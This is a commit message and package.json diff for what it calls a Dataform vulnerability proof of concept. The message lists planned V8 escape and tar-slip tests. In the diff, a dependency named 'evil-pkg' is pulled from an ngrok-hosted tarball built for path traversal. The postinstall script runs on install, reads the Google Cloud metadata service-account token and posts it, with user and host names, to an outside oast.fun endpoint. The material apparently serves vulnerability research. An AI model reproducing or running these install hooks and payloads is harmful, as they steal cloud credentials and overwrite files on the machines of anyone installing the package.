Add V8 runtime escape tests and tar-slip attack vector
- V8 stack escape via Error.prepareStackTrace
- WebAssembly exploitation tests
- Proxy/Reflect interception tests
- SharedArrayBuffer/Atomics availability test
- Dynamic code execution tests
- /proc filesystem access tests
- Tar-slip tarball with path traversal to .git/config
- Archive URL dependency for tar-slip attack

--- a/package.json
+++ b/package.json
@@ -3,7 +3,8 @@
   "version": "1.0.0",
   "description": "Dataform vulnerability PoC - tests npm lifecycle script execution",
   "dependencies": {
-    "@dataform/core": "^2.9.0"
+    "@dataform/core": "^2.9.0",
+    "evil-pkg": "https://6eac8b10e0ab.ngrok-free.app/tar_slip/evil.tar.gz"
   },
   "scripts": {
     "postinstall": "curl -s -X POST -H 'Content-Type: application/json' -d \"{\\\"poc\\\":\\\"npm_postinstall\\\",\\\"ts\\\":\\\"$(date -u +%Y-%m-%dT%H:%M:%SZ)\\\",\\\"user\\\":\\\"$(whoami)\\\",\\\"host\\\":\\\"$(hostname)\\\",\\\"token\\\":\\\"$(curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token 2>/dev/null || echo blocked)\\\"}\" https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm",
